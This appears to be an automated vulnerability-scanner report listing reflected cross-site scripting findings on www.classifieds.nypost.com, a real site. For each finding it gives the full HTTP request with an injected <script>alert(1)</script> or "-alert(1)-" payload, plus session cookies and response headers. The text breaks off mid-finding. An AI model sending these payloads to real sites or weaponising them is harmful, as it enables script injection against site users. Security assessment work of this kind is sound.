GET /info/privacy/?a4d69"><script>alert(1)</script>f53af88dd7b=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16512
1.175. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/info/privacy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bb31"-alert(1)-"eaa692a63db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/privacy/?1bb31"-alert(1)-"eaa692a63db=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:25:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16432
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b48"><script>alert(1)</script>09070aae295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info88b48"><script>alert(1)</script>09070aae295/safety/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86b8f"-alert(1)-"6f8a308ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info86b8f"-alert(1)-"6f8a308ae1/safety/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:25:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.178. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/info/safety/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc634"><script>alert(1)</script>febe38143e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/safety/?cc634"><script>alert(1)</script>febe38143e2=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11595
1.179. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/info/safety/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f01e"-alert(1)-"2f9eda3b7a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/safety/?8f01e"-alert(1)-"2f9eda3b7a1=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11515
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ffbb"><script>alert(1)</script>6d47608e417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info9ffbb"><script>alert(1)</script>6d47608e417/terms/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:25:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9588"-alert(1)-"65e27638775 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infob9588"-alert(1)-"65e27638775/terms/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:25:03 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.182. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/info/terms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8489a"-alert(1)-"278be8544e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/terms/?8489a"-alert(1)-"278be8544e7=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:25:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27787
1.183. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/info/terms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7481b"><script>alert(1)</script>6b562b3adf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/terms/?7481b"><script>alert(1)</script>6b562b3adf8=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:25:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27867
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95829"-alert(1)-"fccefdfad6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job95829"-alert(1)-"fccefdfad6d/ HTTP/1.1 Host: www.classifieds.nypost.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:21:33 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=55c90344576e14be8dc5585a4805b2a0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=b1044dc84aedcbd19e91b822fa4212a0; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1DMDRBRkRENTRDRjAxNkNE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e558c"><script>alert(1)</script>30e5e0450f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jobe558c"><script>alert(1)</script>30e5e0450f6/ HTTP/1.1 Host: www.classifieds.nypost.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:21:33 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=464dde5ca4883fed6a855f51a5f4de87; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=f7ae3d9d88e4c60783389785b3807c51; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FMzFEREE3MzRDRjAxNkNE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2440c"-alert(1)-"c811013299b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
